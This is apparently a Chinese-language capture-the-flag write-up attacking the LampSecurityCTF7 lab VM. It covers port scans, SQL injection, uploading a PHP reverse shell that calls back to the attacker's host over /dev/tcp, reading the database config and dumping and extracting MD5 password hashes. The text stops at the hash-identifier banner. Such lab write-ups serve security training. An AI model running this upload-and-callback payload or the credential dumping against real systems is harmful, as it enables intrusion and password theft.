靶机介绍
LampSecurityCTF7,vulnhub 靶机
主机发现
由于靶机配置问题,扫不到 ip
这里需要特别注意一下,在第一次启动打开靶机的时候,vmware会跳出一个提示框,让你选择我已复制该虚拟机/我已移动该虚拟机,一定要选择移动,用移动的方式网络环境会完整复现。否则有可能在主机发现的时候扫描不到这个靶机。如果后续发现真的出现了无法主机发现,莫慌,重装一下就行了。
(https://blog.csdn.net/Bossfrank/article/details/131324929)
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sn 192.168.50.0/24
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-27 10:32 CST
Nmap scan report for 192.168.50.1
Host is up (0.00016s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.50.134
Host is up (0.00011s latency).
MAC Address: 00:0C:29:83:4F:85 (VMware)
Nmap scan report for 192.168.50.156
Host is up (0.000081s latency).
MAC Address: 00:0C:29:9D:12:A9 (VMware)
Nmap scan report for 192.168.50.254
Host is up (0.00013s latency).
MAC Address: 00:50:56:EC:05:7B (VMware)
Nmap scan report for 192.168.50.147
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 27.90 seconds
┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.50.156
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-27 10:42 CST
Nmap scan report for bogon (192.168.50.156)
Host is up (0.00044s latency).
Not shown: 65505 filtered tcp ports (no-response), 21 filtered tcp ports (host-prohibited)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
137/tcp closed netbios-ns
138/tcp closed netbios-dgm
139/tcp open netbios-ssn
901/tcp open samba-swat
5900/tcp closed vnc
8080/tcp open http-proxy
10000/tcp open snet-sensor-mgmt
MAC Address: 00:0C:29:9D:12:A9 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 13.41 seconds
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -O -p22,80,137,138,139,901,5900,8080,10000 192.168.50.156
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-27 10:46 CST
Nmap scan report for bogon (192.168.50.156)
Host is up (0.00042s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
80/tcp open http Apache httpd 2.2.15 ((CentOS))
137/tcp closed netbios-ns
138/tcp closed netbios-dgm
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MYGROUP)
901/tcp open http Samba SWAT administration server
5900/tcp closed vnc
8080/tcp open http Apache httpd 2.2.15 ((CentOS))
10000/tcp open http MiniServ 1.610 (Webmin httpd)
MAC Address: 00:0C:29:9D:12:A9 (VMware)
Aggressive OS guesses: Linux 2.6.32 - 3.13 (97%), Linux 2.6.39 (96%), Linux 2.6.32 - 3.10 (94%), Linux 2.6.32 (92%), Linux 3.2 - 3.8 (92%), Linux 2.6.22 - 2.6.36 (91%), Linux 3.10 - 4.11 (91%), Tandberg Video Conference System (91%), Linux 2.6.32 - 3.1 (91%), Linux 2.6.32 - 2.6.39 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.89 seconds
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU --min-rate 1000 -p- 192.168.50.156
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-27 10:49 CST
Warning: 192.168.50.156 giving up on port because retransmission cap hit (10).
Nmap scan report for bogon (192.168.50.156)
Host is up (0.00039s latency).
All 65535 scanned ports on bogon (192.168.50.156) are in ignored states.
Not shown: 64800 open|filtered udp ports (no-response), 735 filtered udp ports (host-prohibited)
MAC Address: 00:0C:29:9D:12:A9 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 719.01 seconds
漏洞脚本扫描(扫描很慢,不知道为啥)
┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p22,80,137,138,139,901,5900,8080,10000 192.168.50.156
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-27 11:32 CST
Stats: 0:26:52 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 96.80% done; ETC: 12:00 (0:00:53 remaining)
Stats: 0:35:53 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 97.34% done; ETC: 12:09 (0:00:59 remaining)
Stats: 0:43:13 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.22% done; ETC: 12:16 (0:00:47 remaining)
Nmap scan report for bogon (192.168.50.156)
Host is up (0.00030s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-fileupload-exploiter:
|
| Couldn't find a file-type field.
|
|_ Couldn't find a file-type field.
|_http-trace: TRACE is enabled
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-phpself-xss: ERROR: Script execution failed (use -d to debug)
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
137/tcp closed netbios-ns
138/tcp closed netbios-dgm
139/tcp open netbios-ssn
901/tcp open samba-swat
5900/tcp closed vnc
8080/tcp open http-proxy
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-trace: TRACE is enabled
| http-enum:
|_ /login.php: Possible admin folder
10000/tcp open snet-sensor-mgmt
MAC Address: 00:0C:29:9D:12:A9 (VMware)
Host script results:
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)
| smb-vuln-cve2009-3103:
| VULNERABLE:
| SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
| State: VULNERABLE
| IDs: CVE:CVE-2009-3103
| Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
| Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
| denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
| PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
| aka "SMBv2 Negotiation Vulnerability."
|
| Disclosure date: 2009-09-08
| References:
| http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_smb-vuln-ms06-025: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms10-061: false
|_samba-vuln-cve-2012-1182: SMB: Failed to receive bytes: EOF
|_smb-vuln-ms10-054: false
Nmap done: 1 IP address (1 host up) scanned in 3316.13 seconds
web 渗透
注入试试
8080 端口尝试注一下,没能成,似乎是数据库版本的注释有点问题,有报错信息,可以看一下
这样注入能成
有上传,考虑传个马
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ vim shell.php
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ cat shell.php
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.50.147/1234 0>&1'"); ?>
下一步找 shell.php 的位置,让他向 kali 弹 shell
扫目录,其中 asset 中看到上传文件
┌──(kali㉿kali)-[~]
└─$ sudo dirb http://192.168.50.156/
[sudo] password for kali:
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Fri Sep 27 13:54:34 2024
URL_BASE: http://192.168.50.156/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.50.156/ ----
+ http://192.168.50.156/about (CODE:200|SIZE:4910)
==> DIRECTORY: http://192.168.50.156/assets/
+ http://192.168.50.156/backups (CODE:301|SIZE:333)
+ http://192.168.50.156/cgi-bin/ (CODE:403|SIZE:290)
+ http://192.168.50.156/contact (CODE:200|SIZE:5017)
==> DIRECTORY: http://192.168.50.156/css/
+ http://192.168.50.156/db (CODE:200|SIZE:3904)
+ http://192.168.50.156/default (CODE:200|SIZE:6058)
+ http://192.168.50.156/footer (CODE:200|SIZE:3904)
+ http://192.168.50.156/header (CODE:200|SIZE:3904)
==> DIRECTORY: http://192.168.50.156/img/
==> DIRECTORY: http://192.168.50.156/inc/
+ http://192.168.50.156/index.php (CODE:200|SIZE:6058)
==> DIRECTORY: http://192.168.50.156/js/
+ http://192.168.50.156/newsletter (CODE:200|SIZE:4037)
+ http://192.168.50.156/phpinfo (CODE:200|SIZE:58734)
+ http://192.168.50.156/profile (CODE:200|SIZE:3977)
+ http://192.168.50.156/read (CODE:302|SIZE:1)
+ http://192.168.50.156/recovery (CODE:200|SIZE:4807)
+ http://192.168.50.156/register (CODE:200|SIZE:6591)
+ http://192.168.50.156/signup (CODE:200|SIZE:4783)
+ http://192.168.50.156/usage (CODE:403|SIZE:287)
==> DIRECTORY: http://192.168.50.156/webalizer/
==> DIRECTORY: http://192.168.50.156/webmail/
---- Entering directory: http://192.168.50.156/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.50.156/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.50.156/img/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.50.156/inc/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.50.156/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.50.156/webalizer/ ----
+ http://192.168.50.156/webalizer/index.html (CODE:200|SIZE:3631)
---- Entering directory: http://192.168.50.156/webmail/ ----
+ http://192.168.50.156/webmail/bin (CODE:403|SIZE:293)
+ http://192.168.50.156/webmail/config (CODE:403|SIZE:296)
+ http://192.168.50.156/webmail/favicon.ico (CODE:200|SIZE:1150)
+ http://192.168.50.156/webmail/index.php (CODE:200|SIZE:5157)
==> DIRECTORY: http://192.168.50.156/webmail/installer/
+ http://192.168.50.156/webmail/LICENSE (CODE:403|SIZE:297)
+ http://192.168.50.156/webmail/logs (CODE:403|SIZE:294)
==> DIRECTORY: http://192.168.50.156/webmail/plugins/
==> DIRECTORY: http://192.168.50.156/webmail/program/
+ http://192.168.50.156/webmail/README (CODE:403|SIZE:296)
+ http://192.168.50.156/webmail/robots.txt (CODE:200|SIZE:26)
==> DIRECTORY: http://192.168.50.156/webmail/skins/
+ http://192.168.50.156/webmail/SQL (CODE:403|SIZE:293)
+ http://192.168.50.156/webmail/temp (CODE:403|SIZE:294)
---- Entering directory: http://192.168.50.156/webmail/installer/ ----
==> DIRECTORY: http://192.168.50.156/webmail/installer/images/
+ http://192.168.50.156/webmail/installer/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.50.156/webmail/plugins/ ----
==> DIRECTORY: http://192.168.50.156/webmail/plugins/archive/
==> DIRECTORY: http://192.168.50.156/webmail/plugins/emoticons/
==> DIRECTORY: http://192.168.50.156/webmail/plugins/help/
==> DIRECTORY: http://192.168.50.156/webmail/plugins/password/
==> DIRECTORY: http://192.168.50.156/webmail/plugins/userinfo/
---- Entering directory: http://192.168.50.156/webmail/program/ ----
(!) WARNING: All responses for this directory seem to be CODE = 403.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.50.156/webmail/skins/ ----
==> DIRECTORY: http://192.168.50.156/webmail/skins/classic/
---- Entering directory: http://192.168.50.156/webmail/installer/images/ ----
---- Entering directory: http://192.168.50.156/webmail/plugins/archive/ ----
==> DIRECTORY: http://192.168.50.156/webmail/plugins/archive/skins/
---- Entering directory: http://192.168.50.156/webmail/plugins/emoticons/ ----
---- Entering directory: http://192.168.50.156/webmail/plugins/help/ ----
==> DIRECTORY: http://192.168.50.156/webmail/plugins/help/content/
==> DIRECTORY: http://192.168.50.156/webmail/plugins/help/skins/
---- Entering directory: http://192.168.50.156/webmail/plugins/password/ ----
==> DIRECTORY: http://192.168.50.156/webmail/plugins/password/drivers/
==> DIRECTORY: http://192.168.50.156/webmail/plugins/password/helpers/
+ http://192.168.50.156/webmail/plugins/password/README (CODE:200|SIZE:10645)
---- Entering directory: http://192.168.50.156/webmail/plugins/userinfo/ ----
---- Entering directory: http://192.168.50.156/webmail/skins/classic/ ----
==> DIRECTORY: http://192.168.50.156/webmail/skins/classic/images/
==> DIRECTORY: http://192.168.50.156/webmail/skins/classic/includes/
+ http://192.168.50.156/webmail/skins/classic/README (CODE:200|SIZE:855)
==> DIRECTORY: http://192.168.50.156/webmail/skins/classic/templates/
---- Entering directory: http://192.168.50.156/webmail/plugins/archive/skins/ ----
==> DIRECTORY: http://192.168.50.156/webmail/plugins/archive/skins/classic/
---- Entering directory: http://192.168.50.156/webmail/plugins/help/content/ ----
---- Entering directory: http://192.168.50.156/webmail/plugins/help/skins/ ----
==> DIRECTORY: http://192.168.50.156/webmail/plugins/help/skins/classic/
---- Entering directory: http://192.168.50.156/webmail/plugins/password/drivers/ ----
---- Entering directory: http://192.168.50.156/webmail/plugins/password/helpers/ ----
---- Entering directory: http://192.168.50.156/webmail/skins/classic/images/ ----
==> DIRECTORY: http://192.168.50.156/webmail/skins/classic/images/buttons/
==> DIRECTORY: http://192.168.50.156/webmail/skins/classic/images/display/
+ http://192.168.50.156/webmail/skins/classic/images/favicon.ico (CODE:200|SIZE:1150)
==> DIRECTORY: http://192.168.50.156/webmail/skins/classic/images/icons/
---- Entering directory: http://192.168.50.156/webmail/skins/classic/includes/ ----
---- Entering directory: http://192.168.50.156/webmail/skins/classic/templates/ ----
---- Entering directory: http://192.168.50.156/webmail/plugins/archive/skins/classic/ ----
---- Entering directory: http://192.168.50.156/webmail/plugins/help/skins/classic/ ----
==> DIRECTORY: http://192.168.50.156/webmail/plugins/help/skins/classic/templates/
---- Entering directory: http://192.168.50.156/webmail/skins/classic/images/buttons/ ----
---- Entering directory: http://192.168.50.156/webmail/skins/classic/images/display/ ----
---- Entering directory: http://192.168.50.156/webmail/skins/classic/images/icons/ ----
---- Entering directory: http://192.168.50.156/webmail/plugins/help/skins/classic/templates/ ----
/zt
-----------------
END_TIME: Fri Sep 27 13:59:21 2024
DOWNLOADED: 124624 - FOUND: 32
点击 shell.php ,发现服务器可以解析,服务器执行php,kali 拿到 shell
初级 shell
看一下基础信息
bash-4.1$ sudo -l
sudo -l
sudo: sorry, you must have a tty to run sudo
bash-4.1$ dpkg -l
dpkg -l
bash: dpkg: command not found
bash-4.1$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000
link/ether 00:0c:29:9d:12:a9 brd ff:ff:ff:ff:ff:ff
inet 192.168.50.156/24 brd 192.168.50.255 scope global eth0
inet6 fe80::20c:29ff:fe9d:12a9/64 scope link
valid_lft forever preferred_lft forever
bash-4.1$ python --version
python --version
Python 2.6.6
bash-4.1$ uname -a
uname -a
Linux bogon 2.6.32-279.el6.i686 #1 SMP Fri Jun 22 10:59:55 UTC 2012 i686 i686 i386 GNU/Linux
bash-4.1$ whoami
whoami
apache
bash-4.1$
使用 python 升级 shell
尝试查看当前用户权限发现需要一个类似凭证的密码,这个密码目前没拿到
bash-4.1$ python -c "import pty;pty.spawn('/bin/bash')"
python -c "import pty;pty.spawn('/bin/bash')"
bash-4.1$ sudo -l
sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for apache: exit
Sorry, try again.
[sudo] password for apache: root
Sorry, try again.
[sudo] password for apache: admin
Sorry, try again.
sudo: 3 incorrect password attempts
搞一搞内网信息收集
bash-4.1$ pwd
pwd
/var/www/html/assets
bash-4.1$ cd /var/www
cd /var/www
bash-4.1$ ls
ls
admin cgi-bin error html icons
bash-4.1$ cd admin
cd admin
bash-4.1$ ls
ls
docs index.php newsletters.php reservations.php
feedback.php login.php phpmyadmin trainings.php
inc logout.php readings.php users.php
bash-4.1$ ls -liah
ls -liah
total 68K
260349 drwxrwxr-x. 5 webdev webdev 4.0K Dec 19 2012 .
259983 drwxr-xr-x. 7 root root 4.0K Dec 19 2012 ..
260460 drwxrwxr-x. 2 webdev webdev 4.0K Dec 11 2012 docs
260476 -rw-rw-r--. 1 webdev webdev 1.5K Dec 24 2012 feedback.php
260436 drwxrwxr-x. 2 webdev webdev 4.0K Dec 11 2012 inc
260351 -rw-r--r--. 1 webdev webdev 314 Dec 24 2012 index.php
260442 -rw-rw-r--. 1 webdev webdev 885 Dec 24 2012 login.php
260445 -rw-rw-r--. 1 webdev webdev 236 Dec 24 2012 logout.php
260472 -rw-rw-r--. 1 webdev webdev 3.8K Dec 24 2012 newsletters.php
270632 drwxr-xr-x. 9 root root 4.0K Dec 19 2012 phpmyadmin
260471 -rw-rw-r--. 1 webdev webdev 6.5K Dec 24 2012 readings.php
270635 -rw-rw-r--. 1 webdev webdev 2.5K Dec 24 2012 reservations.php
260439 -rw-rw-r--. 1 webdev webdev 5.6K Dec 24 2012 trainings.php
260447 -rw-rw-r--. 1 webdev webdev 4.8K Dec 24 2012 users.php
bash-4.1$ cd inc
cd inc
bash-4.1$ ls
ls
admin_footer.php admin_header.php base.php db.php
bash-4.1$
找到了一个数据库连接文件
bash-4.1$ cat db.php
cat db.php
<?php
/**
* This file is part of the LAMPSecurity CTF 7
* http://sourceforge.net/projects/lampsecurity
* by Justin C. Klein Keane
*/
class DatabaseConnection {
public function __construct() {
$this->conn = mysql_connect('localhost', 'root', ''); // Change in prod
if (!$this->conn) die('Could not connect: ' . mysql_error());
mysql_select_db('website');
}
public function query($query) {
$result = mysql_query($query);
if (!$result) {
$message = 'Invalid query: ' . mysql_error() . "\n";
$message .= 'Whole query: ' . $query;
die($message);
}
$retval = array();
while ($row = mysql_fetch_assoc($result)) $retval[] = $row;
return $retval;
}
}
function dbin($string) {
return mysql_real_escape_string($string);
}
$db = new DatabaseConnection();bash-4.1$
登录 mysql (mysql 的操作回显等对 shell 交互性有有要求,连接 shell 后用 python 升级 shell 是一般的操作)
bash-4.1$ python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
bash-4.1$ mysql -uroot
mysql -uroot
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 88
Server version: 5.1.66 Source distribution
Copyright (c) 2000, 2012, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>
查看数据库的内容
mysql>
mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| roundcube |
| website |
+--------------------+
4 rows in set (0.00 sec)
mysql> use website
use website
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
show tables;
+-------------------+
| Tables_in_website |
+-------------------+
| contact |
| documents |
| hits |
| log |
| newsletter |
| payment |
| trainings |
| trainings_x_users |
| users |
+-------------------+
9 rows in set (0.00 sec)
mysql>
看一看 users 表的内容
mysql> select * from users;
select * from users;
+-------------------------------+----------------------------------+----------+---------------------+---------+-----------------+--------------------------------------------------------------------------+
| username | password | is_admin | last_login | user_id | realname | profile |
+-------------------------------+----------------------------------+----------+---------------------+---------+-----------------+--------------------------------------------------------------------------+
| brian@localhost.localdomain | e22f07b17f98e0d9d364584ced0e3c18 | 1 | 2012-12-19 11:30:54 | 3 | Brian Hershel | Brian is our technical brains behind the operations and a chief trainer. |
| john@localhost.localdomain | 0d9ff2a4396d6939f80ffe09b1280ee1 | 1 | NULL | 4 | John Durham | |
| alice@localhost.localdomain | 2146bf95e8929874fc63d54f50f1d2e3 | 1 | NULL | 5 | Alice Wonder | |
| ruby@localhost.localdomain | 9f80ec37f8313728ef3e2f218c79aa23 | 1 | NULL | 6 | Ruby Spinster | |
| leon@localhost.localdomain | 5d93ceb70e2bf5daa84ec3d0cd2c731a | 1 | NULL | 7 | Leon Parnetta | |
| julia@localhost.localdomain | ed2539fe892d2c52c42a440354e8e3d5 | 1 | NULL | 8 | Julia Fields | |
| michael@localhost.localdomain | 9c42a1346e333a770904b2a2b37fa7d3 | 0 | NULL | 9 | Michael Saint | |
| bruce@localhost.localdomain | 3a24d81c2b9d0d9aaf2f10c6c9757d4e | 0 | NULL | 10 | Bruce Pottricks | |
| neil@localhost.localdomain | 4773408d5358875b3764db552a29ca61 | 0 | NULL | 11 | Neil Felstein | |
| charles@localhost.localdomain | b2a97bcecbd9336b98d59d9324dae5cf | 0 | NULL | 12 | Charles Adams | |
| foo@bar.com | 4cb9c8a8048fd02294477fcb1a41191a | 0 | NULL | 36 | | |
| test@nowhere.com | 098f6bcd4621d373cade4e832627b4f6 | 0 | NULL | 113 | | |
+-------------------------------+----------------------------------+----------+---------------------+---------+-----------------+--------------------------------------------------------------------------+
12 rows in set (0.00 sec)
破解 md5 的密文
mysql> select username,password from users
select username,password from users
-> ;
;
+-------------------------------+----------------------------------+
| username | password |
+-------------------------------+----------------------------------+
| brian@localhost.localdomain | e22f07b17f98e0d9d364584ced0e3c18 |
| john@localhost.localdomain | 0d9ff2a4396d6939f80ffe09b1280ee1 |
| alice@localhost.localdomain | 2146bf95e8929874fc63d54f50f1d2e3 |
| ruby@localhost.localdomain | 9f80ec37f8313728ef3e2f218c79aa23 |
| leon@localhost.localdomain | 5d93ceb70e2bf5daa84ec3d0cd2c731a |
| julia@localhost.localdomain | ed2539fe892d2c52c42a440354e8e3d5 |
| michael@localhost.localdomain | 9c42a1346e333a770904b2a2b37fa7d3 |
| bruce@localhost.localdomain | 3a24d81c2b9d0d9aaf2f10c6c9757d4e |
| neil@localhost.localdomain | 4773408d5358875b3764db552a29ca61 |
| charles@localhost.localdomain | b2a97bcecbd9336b98d59d9324dae5cf |
| foo@bar.com | 4cb9c8a8048fd02294477fcb1a41191a |
| test@nowhere.com | 098f6bcd4621d373cade4e832627b4f6 |
+-------------------------------+----------------------------------+
12 rows in set (0.00 sec)
mysql>
把用户名和密码拿到本机,先拿 awk 处理一下
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ cat creds.lst
| brian@localhost.localdomain | e22f07b17f98e0d9d364584ced0e3c18 |
| john@localhost.localdomain | 0d9ff2a4396d6939f80ffe09b1280ee1 |
| alice@localhost.localdomain | 2146bf95e8929874fc63d54f50f1d2e3 |
| ruby@localhost.localdomain | 9f80ec37f8313728ef3e2f218c79aa23 |
| leon@localhost.localdomain | 5d93ceb70e2bf5daa84ec3d0cd2c731a |
| julia@localhost.localdomain | ed2539fe892d2c52c42a440354e8e3d5 |
| michael@localhost.localdomain | 9c42a1346e333a770904b2a2b37fa7d3 |
| bruce@localhost.localdomain | 3a24d81c2b9d0d9aaf2f10c6c9757d4e |
| neil@localhost.localdomain | 4773408d5358875b3764db552a29ca61 |
| charles@localhost.localdomain | b2a97bcecbd9336b98d59d9324dae5cf |
| foo@bar.com | 4cb9c8a8048fd02294477fcb1a41191a |
| test@nowhere.com | 098f6bcd4621d373cade4e832627b4f6 |
用 awk 处理一下用户名,写道一个文件里 users.lst (红笔特有的精细操作)
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ cat creds.lst
| brian@localhost.localdomain | e22f07b17f98e0d9d364584ced0e3c18 |
| john@localhost.localdomain | 0d9ff2a4396d6939f80ffe09b1280ee1 |
| alice@localhost.localdomain | 2146bf95e8929874fc63d54f50f1d2e3 |
| ruby@localhost.localdomain | 9f80ec37f8313728ef3e2f218c79aa23 |
| leon@localhost.localdomain | 5d93ceb70e2bf5daa84ec3d0cd2c731a |
| julia@localhost.localdomain | ed2539fe892d2c52c42a440354e8e3d5 |
| michael@localhost.localdomain | 9c42a1346e333a770904b2a2b37fa7d3 |
| bruce@localhost.localdomain | 3a24d81c2b9d0d9aaf2f10c6c9757d4e |
| neil@localhost.localdomain | 4773408d5358875b3764db552a29ca61 |
| charles@localhost.localdomain | b2a97bcecbd9336b98d59d9324dae5cf |
| foo@bar.com | 4cb9c8a8048fd02294477fcb1a41191a |
| test@nowhere.com | 098f6bcd4621d373cade4e832627b4f6 |
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo cat creds.lst | awk -F ' ' '{print $2}'
[sudo] password for kali:
brian@localhost.localdomain
john@localhost.localdomain
alice@localhost.localdomain
ruby@localhost.localdomain
leon@localhost.localdomain
julia@localhost.localdomain
michael@localhost.localdomain
bruce@localhost.localdomain
neil@localhost.localdomain
charles@localhost.localdomain
foo@bar.com
test@nowhere.com
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo cat creds.lst | awk -F ' ' '{print $2}' | awk -F '@' '{print $1}'
brian
john
alice
ruby
leon
julia
michael
bruce
neil
charles
foo
test
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo cat creds.lst | awk -F ' ' '{print $2}' | awk -F '@' '{print $1}' > users.lst
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ cat users.lst
brian
john
alice
ruby
leon
julia
michael
bruce
neil
charles
foo
test
把哈希拿出来
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo cat creds.lst
| brian@localhost.localdomain | e22f07b17f98e0d9d364584ced0e3c18 |
| john@localhost.localdomain | 0d9ff2a4396d6939f80ffe09b1280ee1 |
| alice@localhost.localdomain | 2146bf95e8929874fc63d54f50f1d2e3 |
| ruby@localhost.localdomain | 9f80ec37f8313728ef3e2f218c79aa23 |
| leon@localhost.localdomain | 5d93ceb70e2bf5daa84ec3d0cd2c731a |
| julia@localhost.localdomain | ed2539fe892d2c52c42a440354e8e3d5 |
| michael@localhost.localdomain | 9c42a1346e333a770904b2a2b37fa7d3 |
| bruce@localhost.localdomain | 3a24d81c2b9d0d9aaf2f10c6c9757d4e |
| neil@localhost.localdomain | 4773408d5358875b3764db552a29ca61 |
| charles@localhost.localdomain | b2a97bcecbd9336b98d59d9324dae5cf |
| foo@bar.com | 4cb9c8a8048fd02294477fcb1a41191a |
| test@nowhere.com | 098f6bcd4621d373cade4e832627b4f6 |
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo cat creds.lst | awk -F ' ' '{print $4}'
e22f07b17f98e0d9d364584ced0e3c18
0d9ff2a4396d6939f80ffe09b1280ee1
2146bf95e8929874fc63d54f50f1d2e3
9f80ec37f8313728ef3e2f218c79aa23
5d93ceb70e2bf5daa84ec3d0cd2c731a
ed2539fe892d2c52c42a440354e8e3d5
9c42a1346e333a770904b2a2b37fa7d3
3a24d81c2b9d0d9aaf2f10c6c9757d4e
4773408d5358875b3764db552a29ca61
b2a97bcecbd9336b98d59d9324dae5cf
4cb9c8a8048fd02294477fcb1a41191a
098f6bcd4621d373cade4e832627b4f6
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo cat creds.lst | awk -F ' ' '{print $4}' > hash.lst
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ cat hash.lst
e22f07b17f98e0d9d364584ced0e3c18
0d9ff2a4396d6939f80ffe09b1280ee1
2146bf95e8929874fc63d54f50f1d2e3
9f80ec37f8313728ef3e2f218c79aa23
5d93ceb70e2bf5daa84ec3d0cd2c731a
ed2539fe892d2c52c42a440354e8e3d5
9c42a1346e333a770904b2a2b37fa7d3
3a24d81c2b9d0d9aaf2f10c6c9757d4e
4773408d5358875b3764db552a29ca61
b2a97bcecbd9336b98d59d9324dae5cf
4cb9c8a8048fd02294477fcb1a41191a
098f6bcd4621d373cade4e832627b4f6
识别一下哈希的类型
┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo hash-identifier 'e22f07b17f98e0d9d364584ced0e3c18'
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
